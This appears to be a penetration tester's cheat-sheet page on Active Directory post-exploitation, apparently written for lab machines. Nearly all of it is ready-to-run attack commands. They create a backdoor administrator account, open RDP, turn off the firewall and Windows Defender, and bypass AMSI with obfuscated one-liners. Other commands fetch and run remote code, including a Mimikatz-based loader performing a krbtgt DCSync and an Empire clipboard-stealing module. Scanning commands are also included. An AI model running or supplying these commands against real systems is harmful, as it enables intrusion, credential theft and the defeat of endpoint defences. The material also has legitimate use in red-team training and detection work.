Post Exploitation

Active Directory Post Exploitation Checklists

RDP Stuff

Add Local Administrator

Create user asuka and add to RDP, Admin, and WinRM.

net user asuka 'TrYh@rdeR!' /add
net localgroup "Remote Desktop Users" asuka /add
net localgroup "Administrators" asuka /add
net localgroup "Remote Management Users" asuka /add

Enable RDP Access

Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -
name "fDenyTSConnections" -value 0
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

# In case powershell is not enabled (like in old machine)
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

Access RDP

xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:support.htb /u:asuka /p:'TrYh@rdeR!' +nego /drive:Tools,/home/asuka/Tools/ActiveDirectory/
rdesktop support.htb

# fix ERRCONNECT_TLS_CONNECT_FAILED
xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:support.htb /u:asuka /p:'TrYh@rdeR!' +nego /drive:Tools,/home/asuka/Tools/ActiveDirectory/ /tls-seclevel:0

Defender and Firewall Stuff

Turn Off Firewall

# powershell
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
# cmd
netsh advfirewall set allprofiles state off

Disable Defender Real Time Monitoring

# Remove Defender Database
cmd /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

Get-MpComputerStatus
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -ExclusionExtension "ps1"
Set-MPPreference -DisableBehaviorMonitoring $true

# Disable AMSI (set to 0 to enable)
Set-MpPreference -DisableScriptScanning 1 

# Check all exclusion folder
Get-MpPreference | Select-Object -Property ExclusionPath -ExpandProperty ExclusionPath
# Add folder exclusion (in case tamper protection is enabled)
Add-MpPreference -ExclusionPath C:\Mimikatz\

# Disable Real Time Protection
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

Bypassing PowerShell Security

Using InviShell - https://github.com/OmerYa/Invisi-Shell

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

AMSI Bypass

Detection: https://github.com/RythmStick/AMSITrigger

$a='si';$b='Am';$Ref=[Ref].Assembly.GetType(('System.Management.Automation.{0}{1}Utils'-f $b,$a)); $z=$Ref.GetField(('am{0}InitFailed'-f$a),'NonPublic,Static');$z.SetValue($null,$true)

S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)

OPSEC with Loader

C:\AD\Tools\Loader.exe -path http://172.16.100.67/SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"

Get-ClipboardContents

Monitors the clipboard on a specified interval for changes to copied text.

iex (iwr -usebasicparsing https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Get-ClipboardContents.ps1);Get-ClipboardContents

WADComs

WADComs is an interactive cheat sheet, containing a curated list of offensive security tools and their respective commands, to be used against Windows/AD environments.

https://wadcoms.github.io/

Dump Saved Password

TCP Port Scanner

1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("172.16.8.1",$_)) "Port $_ is open!"} 2>$null # powershell

Ping Sweep

for /l %i in (1,1,254) do @ping -n 1 -w 100 172.16.8.%i > nul && echo 172.16.8.%i is up. # cmd

Inveigh

Responder, but in Powershell/C#

https://github.com/Kevin-Robertson/Inveigh

MDE Enum

How to extract Windows Defender Exclusions and Attack Surface Reduction (ASR) rules without Admin privileges

https://github.com/0xsp-SRD/MDE_Enum

# local
mde-enum.exe /local /paths /access
# remote
mde-enum.exe <ip> <username> <password> <domain> /paths
# i.e
.\mde-enum.exe 172.16.8.148 asuka Asuka@1337 child.zerobyte.lab /paths

Or, use this Powershell script.

$logName = "Microsoft-Windows-Windows Defender/Operational"
$eventID = 5007
$events = Get-WinEvent -LogName $logName | Where-Object { $_.Id -eq $eventID }
$exclusionEvents = $events | Where-Object { $_.Message -match "Exclusions" }
$pattern = "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\[^\s]+"
$exclusionEvents | ForEach-Object {
    if ($_.Message -match $pattern) {
        $matches[0]
    }
}

Reference:

https://x.com/VakninHai/status/1796628601535652289

Other Useful Stuff

PreviousToken Abuse NextTunneling with Ligolo-ng

Last updated 1 year ago

hashtagRDP Stuff

hashtagAdd Local Administrator

hashtagEnable RDP Access

hashtagAccess RDP

hashtagDefender and Firewall Stuff

hashtagTurn Off Firewall

hashtagDisable Defender Real Time Monitoring

hashtagBypassing PowerShell Security

hashtagAMSI Bypass

hashtagOPSEC with Loader

hashtagGet-ClipboardContents

hashtagWADComs

hashtagDump Saved Password

hashtagTCP Port Scanner

hashtagPing Sweep

hashtagInveigh

hashtagMDE Enum

hashtagOther Useful Stuff